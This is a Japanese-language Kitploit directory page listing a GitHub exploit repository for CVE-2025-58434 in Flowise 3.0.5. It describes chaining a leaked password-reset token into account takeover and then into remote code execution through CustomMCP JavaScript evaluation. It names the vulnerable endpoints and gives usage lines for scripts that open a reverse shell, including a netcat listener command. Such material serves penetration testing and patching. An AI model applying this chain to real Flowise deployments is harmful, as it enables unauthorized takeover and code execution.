Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-58434 — Flowise 3.0.5 のエクスプロイトチェーン: パスワードリセットトークンの開示による未認証のアカウント乗っ取り (CVE-2025-58434) を、リモートコード実行のための CustomMCP JavaScript 評価に連鎖させます。 | Kitploit
ツール/GitHubGitHub/r3vpwnx/cve-2025-58434
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証レッドチーミング
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

Flowise 3.0.5 のエクスプロイトチェーン: パスワードリセットトークンの開示による未認証のアカウント乗っ取り (CVE-2025-58434) を、リモートコード実行のための CustomMCP JavaScript 評価に連鎖させます。

リポジトリを見る
1522日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-58434 - Flowiseの未認証アカウント乗っ取り、CustomMCP RCEへの連鎖

Flowise 3.0.5の2つの問題を連鎖させます:

  1. CVE-2025-58434 - パスワードリセットトークンの開示。 POST /api/v1/account/forgot-password は、対象ユーザーの tempToken をJSONレスポンスに直接返します。これを POST /api/v1/account/reset-password に渡すことで、最初の管理者を含む任意のアカウントに既知のパスワードを設定できます -> 完全な 未認証アカウント乗っ取り。
  2. CustomMCP mcpServerConfig のサーバーサイドJavaScript評価。 セッションとワークスペースAPIキー(ステップ1から)を使用して、 POST /api/v1/node-load-method/customMCP に loadMethod=listActions を指定すると、 Flowiseプロセス内で mcpServerConfig 文字列がJavaScriptとして評価され、 require('child_process').exec() によるRCEが可能になります。(ここではATOをコード実行に変えるためだけに使用される別のFlowise問題です。執筆時点ではCVEは割り当てられていません。)

CVE: CVE-2025-58434

要件

python3 -m pip install requests

使用方法

flowise_ato_foothold.py - 完全な連鎖(ATO -> APIキー -> CustomMCPリバースシェル)

python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# `nc -lvnp <LPORT>` を準備しておいてください

flowise_customMCP_rce.py - CustomMCP RCEのみ(APIキーが必要)

python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'

参考情報

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD: CVE-2025-58434

免責事項

認可されたセキュリティテストおよび教育目的のみに使用してください。所有しているシステム、または明示的な書面による許可を得たシステムに対してのみ実行してください。


著者: r3vpwnx

ツールをダウンロード